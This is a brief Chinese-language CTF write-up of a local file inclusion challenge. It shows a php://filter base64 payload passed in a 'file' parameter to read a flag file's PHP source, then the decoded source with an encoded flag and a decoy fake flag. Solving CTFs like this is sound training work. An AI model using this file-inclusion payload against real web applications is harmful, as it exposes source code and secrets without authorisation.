看名字就知道是local file include(本地文件包含),之前的笔记里有写过(打ctf时记的笔记(php))
payload: ?file=php://filter/read=convert.base64-encode/resource=flag

然后base64解码得到

<?php
    // this is the real flag!
    // congratulations!
    $flag = urldecode(base64_decode('bnVhYWN0ZiU3QnRyeWluZ18yX3VzZV9MRklfeWVhaF8lMjElN0Q='));
?>
nuaactf{this_is_the_fake_flag}
<br><br>
Sorry, this is not the real flag.

把'$flag'解码就得到了flag